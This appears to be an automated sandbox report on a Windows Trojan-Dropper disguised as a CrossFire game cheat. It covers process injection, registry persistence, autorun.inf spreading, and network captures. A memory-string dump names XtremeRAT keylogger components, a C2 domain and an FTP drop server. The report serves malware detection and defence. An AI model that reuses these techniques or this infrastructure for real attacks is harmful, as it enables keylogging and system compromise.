MD5: a0933cdef1487bee922d286b49fbffb3
SHA1: 5b414d53819c60f7e25d33ec7cf3f8102c257dfc
SHA256: 89b78ec3236c8a4e3ec40ecbe7fd95fe9356f60e65a62ca79b9c160ab0eadde8
SSDeep: 49152:4qVqqsBvey/EW4m2W46otdNrZ7WmmJAgfiTvP73yQBvBFX:fVpsBvHXM6orIqg6TvnBZF
Size: 2200676 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2017-04-08 01:38:10
Analyzed on: Windows7 SP1 32-bit

Summary:

Trojan-Dropper. Trojan program, intended for stealth installation of other malware into user's system.

Payload

Process activity

The Trojan creates the following process(es):

%original file name%.exe:2388
Encryptado.exe:3724
6092Cheat CF.exe:3392

The Trojan injects its code into the following process(es):

2CFUpdater.exe:1676
svchost.exe:704
iexplore.exe:2104

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:2388 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Encryptado.exe (208081 bytes)

The process Encryptado.exe:3724 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\System32\6092Cheat CF.exe (50 bytes)
C:\Windows\System32\6092Cheat CF.exe.exe (4 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\x.html (0 bytes)

The process 2CFUpdater.exe:1676 makes changes in the file system.
The Trojan deletes the following file(s):

C:\Windows\System32\6092Cheat CF.exe (0 bytes)

The process 6092Cheat CF.exe:3392 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\2CFUpdater.exe (12 bytes)

Registry activity

The process %original file name%.exe:2388 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process Encryptado.exe:3724 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\rP1hcJ3yEctbkYPp]
"6092Cheat CF.exe" = "OK"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\XtremeRAT]
"Mutex" = "rP1hcJ3yEctbkYPp"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process 2CFUpdater.exe:1676 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process 6092Cheat CF.exe:3392 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\6092Cheat CF_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\DDECache\IExplore\WWW_OpenURL]
"WindowClassName" = "DDEMLMom"

[HKLM\SOFTWARE\Microsoft\Tracing\6092Cheat CF_RASMANCS]
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\6092Cheat CF_RASAPI32]
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\6092Cheat CF_RASMANCS]
"FileTracingMask" = "4294901760"
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\DDECache\IExplore\WWW_OpenURL]
"processname" = "iexplore.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\6092Cheat CF_RASAPI32]
"EnableFileTracing" = "0"
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\6092Cheat CF_RASMANCS]
"MaxFileSize" = "1048576"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

Dropped PE files

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer.

VersionInfo

Company Name:
Product Name: Stub
Product Version: 1.0.0.0
Legal Copyright: Copyright (c) 2017
Legal Trademarks:
Original Filename: Stub.exe
Internal Name: Stub.exe
File Version: 1.0.0.0
File Description: Stub
Comments:
Language: Language Neutral

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://bit.ly/2nkQ7fZ	67.199.248.10
hxxp://2cheat.us/site	104.27.153.183
hxxp://2cheat.us/site/	104.27.153.183
hxxp://2cheat.us/favicon.ico	104.27.153.183
hxxp://pastebin.com/raw/Wa8EDhTj	104.20.208.21
hxxp://2cheat.us/downloads/CrossFire/2CF.exe	104.27.153.183
hxxp://www.2cheat.us/downloads/CrossFire/2CF.exe	104.27.152.183
srvitimas.duckdns.org	187.17.54.122
teredo.ipv6.microsoft.com	157.56.106.189

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /downloads/CrossFire/2CF.exe HTTP/1.1

Host: VVV.2cheat.us

Connection: Keep-Alive

HTTP/1.1 404 Not Found

Date: Mon, 24 Apr 2017 00:18:13 GMT

Content-Type: text/html; charset=iso-8859-1

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: __cfduid=dab1ec795373c22269c95663000356f9b1492993093; expires=Tue, 24-Apr-18 00:18:13 GMT; path=/; domain=.2cheat.us; HttpOnly

Server: cloudflare-nginx

CF-RAY: 3544e25084800c89-AMS
12f..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html
><head>.<title>404 Not Found</title>.</head>
;<body>.<h1>Not Found</h1>.<p>The requested UR
L /downloads/CrossFire/2CF.exe was not found on this server.</p>
.<hr>.<address>Apache/2.4.18 (Ubuntu) Server at VVV.2cheat
.us Port 80</address>.</body></html>..1.....0..HTTP/
1.1 404 Not Found..Date: Mon, 24 Apr 2017 00:18:13 GMT..Content-Type: 
text/html; charset=iso-8859-1..Transfer-Encoding: chunked..Connection:
 keep-alive..Set-Cookie: __cfduid=dab1ec795373c22269c95663000356f9b149
2993093; expires=Tue, 24-Apr-18 00:18:13 GMT; path=/; domain=.2cheat.u
s; HttpOnly..Server: cloudflare-nginx..CF-RAY: 3544e25084800c89-AMS..1
2f..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html&
gt;<head>.<title>404 Not Found</title>.</head>
<body>.<h1>Not Found</h1>.<p>The requested URL
 /downloads/CrossFire/2CF.exe was not found on this server.</p>.
<hr>.<address>Apache/2.4.18 (Ubuntu) Server at VVV.2cheat.
us Port 80</address>.</body></html>..1.....0..
<<< skipped >>>

GET /site/ HTTP/1.1

Accept: text/html, application/xhtml xml, */*

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: 2cheat.us

Connection: Keep-Alive

Cookie: __cfduid=d209d72b09fee8eba886abcc2641fc5841492993089

HTTP/1.1 200 OK

Date: Mon, 24 Apr 2017 00:18:09 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

Last-Modified: Sat, 15 Apr 2017 16:23:00 GMT

Vary: Accept-Encoding

Server: cloudflare-nginx

CF-RAY: 3544e239840d72ad-AMS

Content-Encoding: gzip
2ca3.............|...J.........C.A.d2.m.Zk.k... ....T...{...........[.
.d2E......1k.U.v..p.......^i..W....O_..&...5...xz........H...Y...#.NH.
..T...*.e>d:..0D.*.m>..l..@r..$.. ....E..H....z.....B =}y....q.,
.:|h2.&...5_...C...M.rB.h....>tT$g.K...0.%... ....-...T..d.8f..]...
..I!Q24.8...;....%..V........_E. ...!.....1..|y.....(A[...Q...fE.Q..`.
*......,@H..Z.a.[C6lL......D.2l..X..D...D.6.._.3e..G...;t>.q"..@...
R5N.J.W..{.q.:....'.5Pq.UE......0....J......a.*..b'ECK....5.....L..F@.
..$.g....TE..o1.$..s6!.r....B..U>d;g...........6#.T5eA.p-..^k......
.@..5...=.....a.KIp.\..G.........k...J..C.hA..=..A......3...u..!.U0N).
8yH..<..C.......-8..VJ44.......V.==..............=.N80!.].V..|...T.
.A7t.U.......y.;.S..!..M.V07.l.8.x..1...<.C....$C...EC..g..$hyt.M I
..?0...H.........^....w.e....r../o.......c.M......J`e..m....Z.........
.....7....o..c.....QUL....1.....K....V.P... .{..9...d.Z..".z.....N....
.U.......}.k.......:'.$..<k...r..j.EIOZ.( .g...02.'e....T.L.^.....q
..9fB..H.k`.u....j... .."~3.....!......K%M..D..m...).'(&..f.?..kh.^Tp.
.c.i...A..C......Up.B.......:...G.O ..U...a8......gh...Y....I$J<.!.
.1& xB2DW....-..XQ!NE.>g..<a.$.:...w|.{.....p,..o..{.2t..v.<.
r.h...w.G.... i[.V8....i.@..:tR..[;..V3thY.E........s..u...s..~...)..a
'M`A....L*..-.....#6..v.....?.l.*.D#...O..).H..v..6r.>.1..6!.....'C
T<7.Hx.1..<...I.j$....[P.qw....%z.{C....E.C7.!.....s$.MN.&].j..f
.h......w...{..y_.W.......7..j.0......k...............S....u%H...^.X_.
S....cJR.O_.E.;....xb........?......~.U.....!.$LWH..,..rY..H&.....
<<< skipped >>>

GET /2nkQ7fZ HTTP/1.1

Accept: text/html, application/xhtml xml, */*

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: bit.ly

Connection: Keep-Alive

HTTP/1.1 301 Moved Permanently

Server: nginx

Date: Mon, 24 Apr 2017 00:18:08 GMT

Content-Type: text/html; charset=utf-8

Content-Length: 108

Connection: keep-alive

Cache-Control: private, max-age=90

Location: hXXp://2cheat.us/site

Set-Cookie: _bit=h3o0i8-fcec5330b56d7cfeba-00Y; Domain=bit.ly; Expires=Sat, 21 Oct 2017 00:18:08 GMT
<html>.<head><title>Bitly</title></head>
.<body><a href="hXXp://2cheat.us/site">moved here</a>
;</body>.</html>HTTP/1.1 301 Moved Permanently..Server: ng
inx..Date: Mon, 24 Apr 2017 00:18:08 GMT..Content-Type: text/html; cha
rset=utf-8..Content-Length: 108..Connection: keep-alive..Cache-Control
: private, max-age=90..Location: hXXp://2cheat.us/site..Set-Cookie: _b
it=h3o0i8-fcec5330b56d7cfeba-00Y; Domain=bit.ly; Expires=Sat, 21 Oct 2
017 00:18:08 GMT..<html>.<head><title>Bitly</titl
e></head>.<body><a href="hXXp://2cheat.us/site">m
oved here</a></body>.</html>..

GET /raw/Wa8EDhTj HTTP/1.1

Host: pastebin.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Mon, 24 Apr 2017 00:18:12 GMT

Content-Type: text/plain; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: __cfduid=d646cb119cf6c75608ad9cfd87e0570bb1492993092; expires=Tue, 24-Apr-18 00:18:12 GMT; path=/; domain=.pastebin.com; HttpOnly

Cache-Control: public, max-age=1801

Vary: Accept-Encoding

X-XSS-Protection: 1; mode=block

CF-Cache-Status: EXPIRED

Expires: Mon, 24 Apr 2017 00:48:13 GMT

Server: cloudflare-nginx

CF-RAY: 3544e24b90f94e06-DME
3f..ExeVer: 3.0..CFALOn: 1..CFALDt: 22/04..CFElOn: 0..CFElDt: 04/02..0
..HTTP/1.1 200 OK..Date: Mon, 24 Apr 2017 00:18:12 GMT..Content-Type: 
text/plain; charset=utf-8..Transfer-Encoding: chunked..Connection: kee
p-alive..Set-Cookie: __cfduid=d646cb119cf6c75608ad9cfd87e0570bb1492993
092; expires=Tue, 24-Apr-18 00:18:12 GMT; path=/; domain=.pastebin.com
; HttpOnly..Cache-Control: public, max-age=1801..Vary: Accept-Encoding
..X-XSS-Protection: 1; mode=block..CF-Cache-Status: EXPIRED..Expires: 
Mon, 24 Apr 2017 00:48:13 GMT..Server: cloudflare-nginx..CF-RAY: 3544e
24b90f94e06-DME..3f..ExeVer: 3.0..CFALOn: 1..CFALDt: 22/04..CFElOn: 0.
.CFElDt: 04/02..0..

GET /site HTTP/1.1

Accept: text/html, application/xhtml xml, */*

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: 2cheat.us

Connection: Keep-Alive

HTTP/1.1 301 Moved Permanently

Date: Mon, 24 Apr 2017 00:18:09 GMT

Content-Type: text/html; charset=iso-8859-1

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: __cfduid=d209d72b09fee8eba886abcc2641fc5841492993089; expires=Tue, 24-Apr-18 00:18:09 GMT; path=/; domain=.2cheat.us; HttpOnly

Location: hXXp://2cheat.us/site/

Server: cloudflare-nginx

CF-RAY: 3544e238b5f52b2e-AMS
130..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html
><head>.<title>301 Moved Permanently</title>.<
/head><body>.<h1>Moved Permanently</h1>.<p>
The document has moved <a href="hXXp://2cheat.us/site/">here<
/a>.</p>.<hr>.<address>Apache/2.4.18 (Ubuntu) Ser
ver at 2cheat.us Port 80</address>.</body></html>..1
.....0..HTTP/1.1 301 Moved Permanently..Date: Mon, 24 Apr 2017 00:18:0
9 GMT..Content-Type: text/html; charset=iso-8859-1..Transfer-Encoding:
 chunked..Connection: keep-alive..Set-Cookie: __cfduid=d209d72b09fee8e
ba886abcc2641fc5841492993089; expires=Tue, 24-Apr-18 00:18:09 GMT; pat
h=/; domain=.2cheat.us; HttpOnly..Location: hXXp://2cheat.us/site/..Se
rver: cloudflare-nginx..CF-RAY: 3544e238b5f52b2e-AMS..130..<!DOCTYP
E HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>
.<title>301 Moved Permanently</title>.</head><bod
y>.<h1>Moved Permanently</h1>.<p>The document has
 moved <a href="hXXp://2cheat.us/site/">here</a>.</p>
;.<hr>.<address>Apache/2.4.18 (Ubuntu) Server at 2cheat.us
 Port 80</address>.</body></html>..1.....0...
...
<<< skipped >>>

GET /favicon.ico HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Host: 2cheat.us

Connection: Keep-Alive

Cookie: __cfduid=d209d72b09fee8eba886abcc2641fc5841492993089

HTTP/1.1 404 Not Found

Date: Mon, 24 Apr 2017 00:18:10 GMT

Content-Type: text/html; charset=iso-8859-1

Transfer-Encoding: chunked

Connection: keep-alive

CF-Cache-Status: EXPIRED

Server: cloudflare-nginx

CF-RAY: 3544e23cf7732b2e-AMS

Content-Encoding: gzip
eb............M.1k.0..w...L.P=.x.....C.njZ{..X/..X.$....;....w..C..i.u
......}...X=#..f.X4...d.X.VJ...."..(A...Vy...E..i0.wQ..!:9.3s......4..
2x..8D6.~T.g}.;7..s......y....m. ......\.. m......;...\.kxlO...'.\....
...r.P;.a.....pYJ.<..} .=......0..HTTP/1.1 404 Not Found..Date: Mon
, 24 Apr 2017 00:18:10 GMT..Content-Type: text/html; charset=iso-8859-
1..Transfer-Encoding: chunked..Connection: keep-alive..CF-Cache-Status
: EXPIRED..Server: cloudflare-nginx..CF-RAY: 3544e23cf7732b2e-AMS..Con
tent-Encoding: gzip..eb............M.1k.0..w...L.P=.x.....C.njZ{..X/..
X.$....;....w..C..i.u......}...X=#..f.X4...d.X.VJ...."..(A...Vy...E..i
0.wQ..!:9.3s......4..2x..8D6.~T.g}.;7..s......y....m. ......\.. m.....
.;...\.kxlO...'.\.......r.P;.a.....pYJ.<..} .=......0..

The Trojan connects to the servers at the folowing location(s):

.text

`.data

.rsrc

@.reloc

msvcrt.dll

API-MS-Win-Core-ProcessThreads-L1-1-0.dll

KERNEL32.dll

NTDLL.DLL

API-MS-Win-Security-Base-L1-1-0.dll

API-MS-WIN-Service-Core-L1-1-0.dll

API-MS-WIN-Service-winsvc-L1-1-0.dll

RPCRT4.dll

ole32.dll

ntdll.dll

_amsg_exit

RegCloseKey

RegOpenKeyExW

GetProcessHeap

svchost.pdb

version="5.1.0.0"

name="Microsoft.Windows.Services.SvcHost"

<description>Host Process for Windows Services</description>

<requestedExecutionLevel

Software\Microsoft\Windows NT\CurrentVersion\Svchost

Software\Microsoft\Windows NT\CurrentVersion\MgdSvchost

\PIPE\

Host Process for Windows Services

6.1.7600.16385 (win7_rtm.090713-1255)

svchost.exe

Windows

Operating System

6.1.7600.16385

svchost.exe_704_rwx_10000000_001EC000:

.idata

.rdata

P.reloc

P.rsrc

ServerKeyloggerU

789:;<&'()* ,-./12345

%SERVER%

URLMON.DLL

shell32.dll

hXXp://

advapi32.dll

kernel32.dll

mpr.dll

version.dll

comctl32.dll

gdi32.dll

opengl32.dll

user32.dll

wintrust.dll

msimg32.dll

GetKeyboardType

RegOpenKeyExA

RegCloseKey

oleaut32.dll

RegOpenKeyExW

RegCreateKeyW

GetWindowsDirectoryW

UnhookWindowsHookEx

SetWindowsHookExW

MapVirtualKeyW

GetKeyboardLayout

GetKeyState

shlwapi.dll

SHDeleteKeyW

FindExecutableW

URLDownloadToCacheFileW

wininet.dll

FtpPutFileW

FtpSetCurrentDirectoryW

GetKeyboardState

ShellExecuteW

ntdll.dll

1 1$1(1,10141

KWindows

TServerKeylogger

1Mn.ra

Fkk.VB

SZ~05%d;

D=.hN

CCN%U

%.qe5

A.cL:

N.hC`R2

\vl.ZAH=G.

[I.Xp

.GnVD&F

vAv%dy

o*.yN

7>.fv

n: s%SV1

}a`%c

~*.*P1$w

M9xQ%X

)[.yFV

}p.CO

\Nz%d)d

.tWa#dK~

e@P*

L:!&>.yIp

uCMd

p|.ZP

=_cA#x%Dq

yAX.RT1

wK.cu[

5Kv%c

..ZUf

0Cn.VC

e.mYs

sZ.II\

y?b%U

=.kg0

.MlO*

YbC.Ks

.su",

q[%fmEu%Z

Ntus(u-y}8

-l^.ij

|t%XU

-a}[.

YW.cBw

.tT(X9

JL.br

Y.TGi

.nReZQ

eaMSg

Q.GaMC

jjý

*~..Bi

.OGuS

\"G.wD*Pwp

.eQ*>

V .mJ

%XUd6

~.Op)

U%F\=?

1%X/XA

rt%cW

FWEbD

HH.gF

%2ò

M/.Dm

6\BM.ln

).eE~

aSW%s)

O -L}

ÿLmja

^*%X|

cY.iHF

-.lF]a

4.Ghs

c.xL$

Hjea%S

.Uh/(

^}.gWV

.bL$Y

.YvS>

.qc<u

r-%D\4X

~1%U>1

!Ìpq

W$.oQ

=j-r}{

e.eY>z

n[zLkeY-

O.uJ$

%X<c?L

.wg9&

A{CmD0

9.KQR

2%Ui 3

O".RVn$

õ3\

0h.nj

LWeB|u

1%X{VS2p

%CX2R

up%Dz

.N.Vr

M.aG5

0%d,\

1,d.Mh

}Roo.kU

-.qVl

Ns.ev

w%USm

CmDr1

i.yjR

:?=%Xs

.vtQb

w3.xAp7

^R%ud

A^Q.Ca

;g.oY

x*.xK

5o%S=

P8.tl

MG%8X

S.LWUh

o>!.Qy

:=.Nf

{V9Zl<%DK

7%.f~

m.mtv

r%c)-

;%dL@KP

,.AIL

ßz1

E%xRj

ygU.FO

\-.EK

.GT)mH

M.sp"

1T$1a%S

2{.wS

Bv.KJ

6H.AC

rW.tz

^.hAV

/%u??

:%F}E.

Ibow-x}

]r.lyD

%sti^

W.EqY`

S?,%D

~.taMz

x.html

HKEY_CLASSES_ROOT

HKEY_CURRENT_USER

HKEY_LOCAL_MACHINE

HKEY_USERS

HKEY_CURRENT_CONFIG

[Execute]

KeyDelBackspace

<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">

.html

XtremeKeylogger

Software\Microsoft\Windows\CurrentVersion\Run

.functions

icon=shell32.dll,4

shellexecute=

autorun.inf

\Microsoft\Windows\

ÞFAULTBROWSER%

svchost.exe

srvitimas.duckdns.org

Unidadesrvitimas.duckdns.org

{731H88U6-R55S-087S-J218-TRWAXVJY6P51}

HKCU\Software\Microsoft\Windows\CurrentVersion\Run

PTF.ftpserver.com

ftpuser

iexplore.exe_2104:

.text

`.data

.rsrc

@.reloc

>.uzf

.us;}

IEFRAME.dll

MLANG.dll

iertutil.dll

urlmon.dll

ole32.dll

SHELL32.dll

SHLWAPI.dll

msvcrt.dll

USER32.dll

KERNEL32.dll

ADVAPI32.dll

RegOpenKeyExW

RegCloseKey

GetWindowsDirectoryW

_amsg_exit

_wcmdln

UrlApplySchemeW

PathIsURLW

UrlCanonicalizeW

UrlCreateFromPathW

iexplore.pdb

KEYW

KEYWh

KEYWD

.ENNNG.

a.ry.v

l.igM4

?1%SGf

xh.JW^

.97777"7" " " !

3.... )) 

8888888888888

8888888888

.lPV)

úW1

.ApX/

H.ZAf

ð[U

%s!FK

1YYYY1YY9GEAA=77YRNNNW:.VT1

888777777

Y.hilkRROMLK=C,

..(((($$

3...((((%

3....(.''$

3.2...((((%

33.2....(,'

55323222...

(%&'00443445?

00.,,,4(

000.,,9(

0020..9(

003200;(

(#'( (''''!'!

Microsoft.InternetExplorer.Default

user32.dll

Kernel32.DLL

xfire.exe

wlmail.exe

winamp.exe

waol.exe

sidebar.exe

psocdesigner.exe

np.exe

netscape.exe

netcaptor.exe

neoplanet.exe

msn.exe

mshtmpad.exe

mshta.exe

loader42.exe

infopath.exe

iexplore.exe

iepreview.exe

groove.exe

explorer.exe

dreamweaver.exe

contribute.exe

aol.exe

{28fb17e0-d393-439d-9a21-9474a070473a}

Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings

DShell32.dll

Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe

Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}

"%s" %s

Kernel32.dll

\AppPatch\sysmain.sdb

-extoff go.microsoft.com/fwlink/?LinkId=106323

-extoff go.microsoft.com/fwlink/?LinkId=106322

-extoff go.microsoft.com/fwlink/?LinkId=106320

kernel32.dll

{00000000-0000-0000-0000-000000000000}

\\?\Volume

shell:%s

Imaging_CreateWebPagePreview_Perftrack

Browseui_Tabs_Tearoff_BetweenWindows

Frame_URLEntered

Imaging_CreateWebPagePreview

WS_ExecuteQuery

Shdocvw_BaseBrowser_FireEvent_WindowStateChanged

IdleTask_Execution_Time

9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)

IEXPLORE.EXE

Windows

9.00.8112.16421

iexplore.exe_2104_rwx_10000000_001EC000:

.idata

.rdata

P.reloc

P.rsrc

ServerKeyloggerU

789:;<&'()* ,-./12345

%SERVER%

URLMON.DLL

shell32.dll

hXXp://

advapi32.dll

kernel32.dll

mpr.dll

version.dll

comctl32.dll

gdi32.dll

opengl32.dll

user32.dll

wintrust.dll

msimg32.dll

GetKeyboardType

RegOpenKeyExA

RegCloseKey

oleaut32.dll

RegOpenKeyExW

RegCreateKeyW

GetWindowsDirectoryW

UnhookWindowsHookEx

SetWindowsHookExW

MapVirtualKeyW

GetKeyboardLayout

GetKeyState

shlwapi.dll

SHDeleteKeyW

FindExecutableW

URLDownloadToCacheFileW

wininet.dll

FtpPutFileW

FtpSetCurrentDirectoryW

GetKeyboardState

ShellExecuteW

ntdll.dll

1 1$1(1,10141

KWindows

TServerKeylogger

1Mn.ra

Fkk.VB

SZ~05%d;

D=.hN

CCN%U

%.qe5

A.cL:

N.hC`R2

\vl.ZAH=G.

[I.Xp

.GnVD&F

vAv%dy

o*.yN

7>.fv

n: s%SV1

}a`%c

~*.*P1$w

M9xQ%X

)[.yFV

}p.CO

\Nz%d)d

.tWa#dK~

e@P*

L:!&>.yIp

uCMd

p|.ZP

=_cA#x%Dq

yAX.RT1

wK.cu[

5Kv%c

..ZUf

0Cn.VC

e.mYs

sZ.II\

y?b%U

=.kg0

.MlO*

YbC.Ks

.su",

q[%fmEu%Z

Ntus(u-y}8

-l^.ij

|t%XU

-a}[.

YW.cBw

.tT(X9

JL.br

Y.TGi

.nReZQ

eaMSg

Q.GaMC

jjý

*~..Bi

.OGuS

\"G.wD*Pwp

.eQ*>

V .mJ

%XUd6

~.Op)

U%F\=?

1%X/XA

rt%cW

FWEbD

HH.gF

%2ò

M/.Dm

6\BM.ln

).eE~

aSW%s)

O -L}

ÿLmja

^*%X|

cY.iHF

-.lF]a

4.Ghs

c.xL$

Hjea%S

.Uh/(

^}.gWV

.bL$Y

.YvS>

.qc<u

r-%D\4X

~1%U>1

!Ìpq

W$.oQ

=j-r}{

e.eY>z

n[zLkeY-

O.uJ$

%X<c?L

.wg9&

A{CmD0

9.KQR

2%Ui 3

O".RVn$

õ3\

0h.nj

LWeB|u

1%X{VS2p

%CX2R

up%Dz

.N.Vr

M.aG5

0%d,\

1,d.Mh

}Roo.kU

-.qVl

Ns.ev

w%USm

CmDr1

i.yjR

:?=%Xs

.vtQb

w3.xAp7

^R%ud

A^Q.Ca

;g.oY

x*.xK

5o%S=

P8.tl

MG%8X

S.LWUh

o>!.Qy

:=.Nf

{V9Zl<%DK

7%.f~

m.mtv

r%c)-

;%dL@KP

,.AIL

ßz1

E%xRj

ygU.FO

\-.EK

.GT)mH

M.sp"

1T$1a%S

2{.wS

Bv.KJ

6H.AC

rW.tz

^.hAV

/%u??

:%F}E.

Ibow-x}

]r.lyD

%sti^

W.EqY`

S?,%D

~.taMz

x.html

HKEY_CLASSES_ROOT

HKEY_CURRENT_USER

HKEY_LOCAL_MACHINE

HKEY_USERS

HKEY_CURRENT_CONFIG

[Execute]

KeyDelBackspace

<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">

.html

XtremeKeylogger

Software\Microsoft\Windows\CurrentVersion\Run

.functions

icon=shell32.dll,4

shellexecute=

autorun.inf

\Microsoft\Windows\

ÞFAULTBROWSER%

svchost.exe

srvitimas.duckdns.org

Unidadesrvitimas.duckdns.org

{731H88U6-R55S-087S-J218-TRWAXVJY6P51}

HKCU\Software\Microsoft\Windows\CurrentVersion\Run

PTF.ftpserver.com

ftpuser

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Encryptado.exe

%Program Files%\Internet Explorer\iexplore.exe

iexplore.exe_524:

.text

`.data

.rsrc

@.reloc

>.uzf

.us;}

IEFRAME.dll

MLANG.dll

iertutil.dll

urlmon.dll

ole32.dll

SHELL32.dll

SHLWAPI.dll

msvcrt.dll

USER32.dll

KERNEL32.dll

ADVAPI32.dll

RegOpenKeyExW

RegCloseKey

GetWindowsDirectoryW

_amsg_exit

_wcmdln

UrlApplySchemeW

PathIsURLW

UrlCanonicalizeW

UrlCreateFromPathW

iexplore.pdb

KEYW

KEYWh

KEYWD

.ENNNG.

a.ry.v

l.igM4

?1%SGf

xh.JW^

.97777"7" " " !

3.... )) 

8888888888888

8888888888

.lPV)

úW1

.ApX/

H.ZAf

ð[U

%s!FK

1YYYY1YY9GEAA=77YRNNNW:.VT1

888777777

Y.hilkRROMLK=C,

..(((($$

3...((((%

3....(.''$

3.2...((((%

33.2....(,'

55323222...

(%&'00443445?

00.,,,4(

000.,,9(

0020..9(

003200;(

(#'( (''''!'!

Microsoft.InternetExplorer.Default

user32.dll

Kernel32.DLL

xfire.exe

wlmail.exe

winamp.exe

waol.exe

sidebar.exe

psocdesigner.exe

np.exe

netscape.exe

netcaptor.exe

neoplanet.exe

msn.exe

mshtmpad.exe

mshta.exe

loader42.exe

infopath.exe

iexplore.exe

iepreview.exe

groove.exe

explorer.exe

dreamweaver.exe

contribute.exe

aol.exe

{28fb17e0-d393-439d-9a21-9474a070473a}

Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings

DShell32.dll

Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe

Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}

"%s" %s

Kernel32.dll

\AppPatch\sysmain.sdb

